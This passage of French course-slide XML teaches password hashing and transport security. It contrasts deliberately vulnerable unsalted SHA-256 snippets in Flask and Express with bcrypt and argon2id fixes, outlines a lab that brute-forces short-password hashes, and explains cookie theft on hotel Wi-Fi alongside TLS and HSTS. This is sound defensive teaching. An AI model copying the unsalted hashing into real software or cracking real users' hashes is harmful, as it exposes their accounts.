              <a:t>un pepper éventuel, côté serveur, pas dans la ligne SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3419856"/>
            <a:ext cx="10058400" cy="54864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05840" y="3419856"/>
            <a:ext cx="64008" cy="54864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325880" y="3474720"/>
            <a:ext cx="9601200" cy="475488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>une politique de rotation si le pepper fuit — pas si un hash fuit</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A  ·  hashrate</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Comparer SHA-256 et Argon2id. Regarder un hash.</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day-1/s3_password-hashing</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local  ·  day-1/s3_password-hashing  ·  Flask :8015  ·  Express :8016</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README. Un serveur : Flask ou Express. admin / password.</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Afficher le hash SHA-256. Hasher 10 000 fois. Noter hashes/s.</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Page Argon2id : créer un hash. Relancer. Les deux chaînes diffèrent : le sel.</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Voir la vitesse. Voir $argon2id$… et un sel unique par hash.</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Login. Afficher le hash. Hasher 10 000 fois.</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Comparer avec Argon2id : un hash, puis projeter 10 000 calculs.</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python-flask/argon2_demo.py ou npm run demo:argon2 : même password, deux hashes.</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A · snippets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Vulnérable : password seul, pas de sel, pas de pepper</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Flask  ·  sha256_password</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password = request.json["password"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># pas de salt, pas de pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password_hash = hashlib.sha256(password.encode()).hexdigest()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># POST /api/benchmark : 10 000 fois ça</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Express  ·  sha256Password</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const password = req.body.password;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// pas de salt, pas de pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const passwordHash = crypto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  .createHash("sha256")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  .update(password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  .digest("hex");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// POST /api/benchmark : 10 000 fois ça</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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Même mot de passe → même hash. Un dico suffit. Le bouton « Hasher 10 000 fois » le chronomètre.</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A · snippets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Correctif : password, salt, pepper optionnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="1874519"/>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874519"/>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Flask</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="1490471"/>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import os, bcrypt</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password = request.json["password"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>salt = bcrypt.gensalt()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>pepper = os.environ.get("PEPPER")       # optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>material = f"{password}{pepper or ''}".encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password_hash = bcrypt.hashpw(material, salt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># argon2id en prod : le salt est déjà dans password_hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># $argon2id$v=19$m=65536,t=3,p=4$&lt;salt&gt;$&lt;hash&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3081527"/>
            <a:ext cx="10058400" cy="199339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3081527"/>
            <a:ext cx="64008" cy="199339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3154679"/>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Express</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="3392423"/>
            <a:ext cx="9729216" cy="160934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import bcrypt from "bcrypt";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const password = req.body.password;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const salt = await bcrypt.genSalt(12);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const pepper = process.env.PEPPER;      // optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const material = password + (pepper || "");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>const passwordHash = await bcrypt.hash(material, salt);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>// argon2id en prod : le salt est déjà dans passwordHash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="11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salt : unique par hash, rangé avec. pepper : secret serveur, pas dans la ligne SQL, optionnel. password : jamais en clair.</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B  ·  rainbow table</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Maintenant, vous implémentez la rainbow table</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day-1/s3_password-hashing</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Page D3cryp1  ·  /decrypt.html  ·  Flask ou Express</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azAZ09 puissance la longueur : ce n’est pas la RAM. C’est le nombre de clés du dico.</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À 3–4 caractères, un dictionnaire hash → mot n’existe plus. Trop de clés.</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Une vraie rainbow table s’écrit au fil de l’eau. Ici : on génère, on teste, on jette.</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Générer les candidats à la volée, tester chaque hash, trouver le mot. Rien n’est déchiffré.</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Ouvrir /decrypt.html. D3cryp1. rainbow-table.js : ne remplissez pas un {} de toutes les clés.</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Boucle longueur 1 → n. Pour chaque candidat : SHA-256, comparer au hash cible, passer au suivant.</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3–4 lettres pour le cours. Au-delà, le dico a trop de clés. C’est le point.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B · le fichier</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rainbow-table.js : générer à la volée, pas stocker</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return {}  n’est pas « mettez-y 62^n clés ». Le dico n’a pas cette taille de clés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On mime une rainbow table : chaque valeur est testée, puis oubliée.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="d1s3-rainbow-table.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119383" y="1591056"/>
            <a:ext cx="7922753"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Pas un problème de RAM. Un problème de nombre de clés. createRainbowTable ne doit pas tout garder.</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SHA-256 ne protège pas un mot de passe</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qu’on lit dans un hash argon2id</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on ne range pas la rainbow table en mémoire</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Password hashing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SHA-256 ne protège pas un mot de passe</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Trop rapide. 10 000 hashes : un claquement de doigts. Un dico gagne.</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qu’on lit dans un hash argon2id</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$argon2id$… sel, params, hash. Deux appels, deux chaînes. verify ne déchiffre pas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="334670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45643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47472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on ne range pas la rainbow table en mémoire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="380390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azAZ09^n : trop de clés dans le dico, pas trop de RAM. On génère, on teste, on jette.</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48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04</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HTTPS, Secure, HSTS</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talk + lab  ·  une comparaison S2 / S4  ·  admin / password</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49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04 · diagramme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="859536"/>
            <a:ext cx="10058400" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP, TLS, HSTS — en une image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="133502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1005840" y="1481328"/>
            <a:ext cx="3118104" cy="3063240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FEF2F2"/>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481328"/>
            <a:ext cx="64008" cy="3063240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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207008" y="1682496"/>
            <a:ext cx="2825496" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1. HTTP clair</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="2212848"/>
            <a:ext cx="2825496" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Qui écoute le Wi-Fi lit le Cookie.
Le token voyage en clair.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4475988" y="1481328"/>
            <a:ext cx="3118104" cy="3063240"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F0FDF4"/>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475988" y="1481328"/>
            <a:ext cx="64008" cy="3063240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="16A3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77156" y="1682496"/>
            <a:ext cx="2825496" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="16A34A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2. TLS (HTTPS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4677156" y="2212848"/>
            <a:ext cx="2825496" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le tunnel est chiffré.
L'écouteur ne voit plus le contenu.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946136" y="1481328"/>
            <a:ext cx="3118104" cy="306324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7946136" y="1481328"/>
            <a:ext cx="64008" cy="3063240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4E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47304" y="1682496"/>
            <a:ext cx="2825496" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3. HSTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8147304" y="2212848"/>
            <a:ext cx="2825496" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le navigateur refuse de
repasser en HTTP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4681728"/>
            <a:ext cx="10058400" cy="1005840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure sans HTTPS est un mensonge. HSTS empêche le navigateur de retomber en clair.</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04 · hôtel</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Et HTTPS, dans tout ça ?</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3832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Cookie capturé → on rejoue, on est vous. Souvent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wi-Fi hôtel : un voisin peut devenir la passerelle, mentir sur le DNS, vous faire atterrir sur son hôte. HTTP : il lit tout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTPS tient si le certificat est le bon. Ça n’empêche pas le premier rebond (DNS, captive portal). Un clic « continuer » sur un faux cert annule tout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VPN : le tunnel part avant, DNS compris. Le voisin ne peut plus ni lire, ni vous rediriger. Ce n’est pas un HTTPS de rechange — et un VPN malveillant EST un MITM, choisi.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5074920"/>
            <a:ext cx="6035040" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
